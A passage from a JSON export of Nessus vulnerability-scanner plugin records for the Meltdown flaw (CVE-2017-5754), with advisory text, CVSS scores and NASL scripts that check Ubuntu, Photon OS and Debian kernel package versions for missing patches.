security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:01", "description": "Jann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-euclid, linux-kvm vulnerability (USN-3522-1) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-euclid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-euclid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105724", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105724);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-1\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-euclid, linux-kvm vulnerability (USN-3522-1) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-euclid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-euclid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1015-kvm\", pkgver:\"4.4.0-1015.20\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1047-aws\", pkgver:\"4.4.0-1047.56\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-108-generic\", pkgver:\"4.4.0-108.131\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-108-lowlatency\", pkgver:\"4.4.0-108.131\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-9021-euclid\", pkgver:\"4.4.0-9021.22\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1047.49\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-euclid\", pkgver:\"4.4.0.9021.21\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.108.113\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1015.15\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.108.113\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"linux-image-4.4-aws / linux-image-4.4-euclid / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:54:14", "description": "An update of [linux] packages for PhotonOS has been released. This kernel update fixes vulnerability [CVE-2017-5754](https://web.nvd.nist .gov/view/vuln/detail?vulnId=CVE-2017-5754) which is commonly known as Meltdown vulnerability.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0097 (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0097.NASL", "href": "https://www.tenable.com/plugins/nessus/111909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0097. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111909);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0097 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released. This\nkernel update fixes vulnerability [CVE-2017-5754](https://web.nvd.nist\n.gov/view/vuln/detail?vulnId=CVE-2017-5754) which is commonly known as\nMeltdown vulnerability.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-97\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e32d79a\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.110-1.ph1\",\n \"linux-debuginfo-4.4.110-1.ph1\",\n \"linux-dev-4.4.110-1.ph1\",\n \"linux-docs-4.4.110-1.ph1\",\n \"linux-drivers-gpu-4.4.110-1.ph1\",\n \"linux-esx-4.4.110-1.ph1\",\n \"linux-esx-debuginfo-4.4.110-1.ph1\",\n \"linux-esx-devel-4.4.110-1.ph1\",\n \"linux-esx-docs-4.4.110-1.ph1\",\n \"linux-oprofile-4.4.110-1.ph1\",\n \"linux-sound-4.4.110-1.ph1\",\n \"linux-tools-4.4.110-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:43:12", "description": "USN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory. (CVE-2017-5754).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerability (USN-3522-2) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3522-2.NASL", "href": "https://www.tenable.com/plugins/nessus/105725", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105725);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-2\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerability (USN-3522-2) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. 
This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory. (CVE-2017-5754).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-1009-aws\", pkgver:\"4.4.0-1009.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-108-generic\", pkgver:\"4.4.0-108.131~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-108-lowlatency\", pkgver:\"4.4.0-108.131~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.108.91\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.108.91\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T14:13:22", "description": "Multiple researchers have discovered a vulnerability in Intel processors, enabling an attacker controlling an unprivileged process to read memory from arbitrary addresses, including from the kernel and all other 
processes running on the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux kernel for the Intel x86-64 architecture by a patch set named Kernel Page Table Isolation, enforcing a near complete separation of the kernel and userspace address maps and preventing the attack. This solution might have a performance impact, and can be disabled at boot time by passing pti=off to the kernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall interface, for example chroot and containers using (e)glibc 2.13 and older, including those based on Debian 7 or RHEL/CentOS 6.\nThis regression will be fixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not addressed in this update and will be fixed in a later update.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Debian DSA-4078-1 : linux - security update (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-07-15T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", 
"cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4078.NASL", "href": "https://www.tenable.com/plugins/nessus/105595", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4078. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105595);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"DSA\", value:\"4078\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Debian DSA-4078-1 : linux - security update (Meltdown)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple researchers have discovered a vulnerability in Intel\nprocessors, enabling an attacker controlling an unprivileged process\nto read memory from arbitrary addresses, including from the kernel and\nall other processes running on the system.\n\nThis specific attack has been named Meltdown and is addressed in the\nLinux kernel for the Intel x86-64 architecture by a patch set named\nKernel Page Table Isolation, enforcing a near complete separation of\nthe kernel and userspace address maps and preventing the attack. 
